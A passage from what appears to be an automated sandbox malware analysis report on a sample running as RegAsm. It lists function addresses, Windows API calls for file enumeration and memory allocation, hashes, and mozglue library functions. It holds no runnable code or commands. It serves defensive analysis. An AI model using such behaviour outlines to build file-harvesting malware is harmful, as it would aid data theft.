                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2500673778-0
                                                                                                                                                                                                                                                    • Opcode ID: 80939933e9bb62a304a8a6f5f6ab90fd9a5a09ea7be375ed00fbf10442b0a5d4
                                                                                                                                                                                                                                                    • Instruction ID: 5802ae16847147e7e2b41df3c74560bf2ef48d63530e09df17106534113733f6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80939933e9bb62a304a8a6f5f6ab90fd9a5a09ea7be375ed00fbf10442b0a5d4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DB18F71805248EACB14EBE4C955AEEBBB8AF19304F54417EE406736D2DB382B0CCB75
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00417670 Relevance: 2.6, APIs: 2, Instructions: 141stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00411530: SHGetFolderPathA.SHELL32(00000000,^iB,00000000,00000000,?,00000000), ref: 00411568
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 004176C7
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015D1828), ref: 004176E6
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: wsprintfA.USER32 ref: 004173E8
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: FindFirstFileA.KERNEL32(?,?), ref: 004173FF
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: StrCmpCA.SHLWAPI(?,00427500), ref: 0041743C
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: StrCmpCA.SHLWAPI(?,00427504), ref: 00417456
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: wsprintfA.USER32 ref: 0041747B
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: StrCmpCA.SHLWAPI(?,0042717E), ref: 0041748A
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: wsprintfA.USER32 ref: 004174A7
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: PathMatchSpecA.SHLWAPI(?,?), ref: 004174D7
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: lstrcat.KERNEL32(?,015CF750), ref: 00417503
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: lstrcat.KERNEL32(?,0042751C), ref: 00417515
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: lstrcat.KERNEL32(?,?), ref: 00417523
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: lstrcat.KERNEL32(?,00427520), ref: 00417535
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: lstrcat.KERNEL32(?,?), ref: 00417549
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: wsprintfA.USER32 ref: 004174C6
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: FindNextFileA.KERNEL32(000000FF,?), ref: 00417617
                                                                                                                                                                                                                                                      • Part of subcall function 004173B0: FindClose.KERNEL32(000000FF), ref: 00417629
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 153043497-0
                                                                                                                                                                                                                                                    • Opcode ID: 9fb54ca20fe2cffefdbf3ad616eef28bda897d501f7ebb2f88a1b162a4478fbc
                                                                                                                                                                                                                                                    • Instruction ID: 4b8fbc186d192a9501c9b4b0c12e65ea48b1852fb00ff51ca67b44139ad5a539
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fb54ca20fe2cffefdbf3ad616eef28bda897d501f7ebb2f88a1b162a4478fbc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C851BEB5900208EBCB15EFA4CC42EFE7779AB48704F00426EF81567291DB786B54CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00406550 Relevance: 2.6, APIs: 2, Instructions: 71memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,00406A0E,00000000), ref: 004065AF
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,00406A0E,00000000), ref: 004065E3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                    • Opcode ID: 05b4c1d6b8d8c16b753068be011d095b66a4696be7e78814b8d4b5191835b582
                                                                                                                                                                                                                                                    • Instruction ID: 307c63db32dd85507ef60eb9078a071d01a6145ff22a74080f45120ef5a07aab
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05b4c1d6b8d8c16b753068be011d095b66a4696be7e78814b8d4b5191835b582
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B021E4713407006BD334CF79DC81BABB7EAEB84714F14492EEA1EDA3D0D679E8408658
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004069C0 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 502218ac8f0e4881c669f2ac96244a819e274f1918e165969c54baa6136c6fb7
                                                                                                                                                                                                                                                    • Instruction ID: b213c3f61cc0c17204699b0dcd1147e661e4ec90865d328435e02fb6616344fd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 502218ac8f0e4881c669f2ac96244a819e274f1918e165969c54baa6136c6fb7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 074180B1A002159FDB14DF59D940AAFB7B8AF44314F01807AE809F7381E638DD60CB95
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00411590 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00413AC1,?,00000001,00000004,?,00413AC0,00000000,00000000), ref: 004115AC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocLocal
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3494564517-0
                                                                                                                                                                                                                                                    • Opcode ID: ea00a148863c1ebc4c14e0b152142d2a107d03e69eab002bf71996523b5e63db
                                                                                                                                                                                                                                                    • Instruction ID: 446b8eb09cb615b4c9febfa7265cbe56218a52d25b9eae590fe9dc160874adca
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea00a148863c1ebc4c14e0b152142d2a107d03e69eab002bf71996523b5e63db
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0F020363006A12B83120E6D8840BA7B7EFEBC9A60704016BEB4ACB324CA31DC4042E0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 6C6E6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C6E6CCC
                                                                                                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C6E6D11
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0000000C), ref: 6C6E6D26
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C6E6D35
                                                                                                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C6E6D53
                                                                                                                                                                                                                                                    • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C6E6D73
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C6E6D80
                                                                                                                                                                                                                                                    • CertGetNameStringW.CRYPT32 ref: 6C6E6DC0
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6C6E6DDC
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C6E6DEB
                                                                                                                                                                                                                                                    • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C6E6DFF
                                                                                                                                                                                                                                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C6E6E10
                                                                                                                                                                                                                                                    • CryptMsgClose.CRYPT32(00000000), ref: 6C6E6E27
                                                                                                                                                                                                                                                    • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C6E6E34
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C6E6EF9
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6C6E6F7D
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C6E6F8C
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C6E709D
                                                                                                                                                                                                                                                    • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C6E7103
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C6E7153
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C6E7176
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E7209
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E723A
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E726B
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E729C
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E72DC
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E730D
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6E73C2
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E73F3
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E73FF
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E7406
                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C6E740D
                                                                                                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C6E741A
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C6E755A
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6E7568
                                                                                                                                                                                                                                                    • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C6E7585
                                                                                                                                                                                                                                                    • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C6E7598
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C6E75AC
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                                                                                    • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                                                                                    • API String ID: 3256780453-3980470659
                                                                                                                                                                                                                                                    • Opcode ID: 606a5693b5915bd5150b26555f82ccd2064775fc238fd150c61a7e0b545ff567
                                                                                                                                                                                                                                                    • Instruction ID: d57e1eb0ae871d3a4d0b51024e685477d5beb20a21d8878fddb4c1189435b92a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 606a5693b5915bd5150b26555f82ccd2064775fc238fd150c61a7e0b545ff567
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3252E5B1A053189BEB21DF25CD88BAA77B8EF49318F1041AAE50997641DF30BF84CF55
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C71F070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C71F09B
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5B85
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: EnterCriticalSection.KERNEL32(6C75F688,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5B90
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: LeaveCriticalSection.KERNEL32(6C75F688,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5BD8
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: GetTickCount64.KERNEL32 ref: 6C6F5BE4
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C71F0AC
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: GetTickCount64.KERNEL32 ref: 6C6F5D40
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6F5D67
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C71F0BE
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: __aulldiv.LIBCMT ref: 6C6F5DB4
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C6F5DED
                                                                                                                                                                                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C71F155
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F1E0
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F1ED
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F212
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F229
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F231
                                                                                                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C71F248
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F2AE
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F2BB
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F2F8
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: GetCurrentProcess.KERNEL32(?,6C6D31A7), ref: 6C70CBF1
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6D31A7), ref: 6C70CBFA
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F350
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F35D
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F381
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F398
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F3A0
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F489
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F491
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C71F3CF
                                                                                                                                                                                                                                                      • Part of subcall function 6C71F070: GetCurrentThreadId.KERNEL32 ref: 6C71F440
                                                                                                                                                                                                                                                      • Part of subcall function 6C71F070: AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F44D
                                                                                                                                                                                                                                                      • Part of subcall function 6C71F070: ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F472
                                                                                                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C71F4A8
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F559
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F561
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F577
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F585
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F5A3
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C71F56A
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_resume, xrefs: 6C71F239
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6C71F499
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6C71F3A8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                                                                                                                                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                                                    • API String ID: 565197838-2840072211
                                                                                                                                                                                                                                                    • Opcode ID: 4c6d98da5a148cd2e0a3620c67b22653cb6233c39c898bd0a155853287b8040a
                                                                                                                                                                                                                                                    • Instruction ID: 31412114396840fac10dbc7b2bfaadb7750114cd306e15b3437ef4e0bf5d8088
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c6d98da5a148cd2e0a3620c67b22653cb6233c39c898bd0a155853287b8040a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13D11671B083048FDB009F79D5087AA77F9EB46368F98463AE96593F80CF705909C7A6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
